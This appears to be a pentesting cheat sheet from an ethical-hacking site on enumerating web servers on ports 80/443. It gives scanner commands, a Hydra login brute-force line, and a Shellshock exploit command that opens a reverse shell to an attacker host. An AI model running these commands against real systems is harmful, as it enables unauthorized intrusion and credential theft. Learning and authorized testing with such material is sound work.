Port 80/443 – HTTP/HTTPS

How to enumerate port 80/443 (HTTP/HTTPS)

0

Find hidden files and directories:

# Dirb
dirb https://192.168.1.101

or

# Gobuster - remove relevant responde codes (403 for example)
gobuster -u http://192.168.1.101 -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt -s '200,204,301,302,307,403,500' -e

Nikto web server scan:

nikto -h 192.168.1.101

WordPress scan:

wpscan -u 192.168.1.101/wp/

Joomla scan:

If you want to do a penetration test on a Joomla CMS, OWASP JoomScan is Your best shot ever!

joomscan -u http://192.168.1.101

DAVTest:

DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which enable for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.

davtest -url http://192.168.1.101

Cracking Web Forms with Hydra:

hydra -L <username list> -p <password list> <IP Address> <form parameters><failed login message>

For example:

hydra -L <wordlist> -P<password list> 192.168.1.101 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"

SSL vulnerabilities:

Always check for SSL-vulnerabilities such as heartbleed.
sslscan 192.168.1.101:443

nmap -sV --script=ssl-heartbleed 192.168.1.101

 

cgi-bin (ShellShock):

If you found the “cgi-bin” directory, try to brute force the files inside it because it might be vulnerable to shellshock vulnerability. You can exploit it like that in Apache (change the value of the pages with the discovered files):

python /usr/share/exploitdb/platforms/linux/remote/34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.16.47 lport=4443 pages=/cgi-bin/user.sh

shellshock

Leave A Reply

Your email address will not be published.

SignupSubscribe to our newsletter to get the latest ethical hacking & penetration testing tutorials & resources.

Subscribe to our newsletter to get the latest ethical hacking & penetration testing tutorials & resources.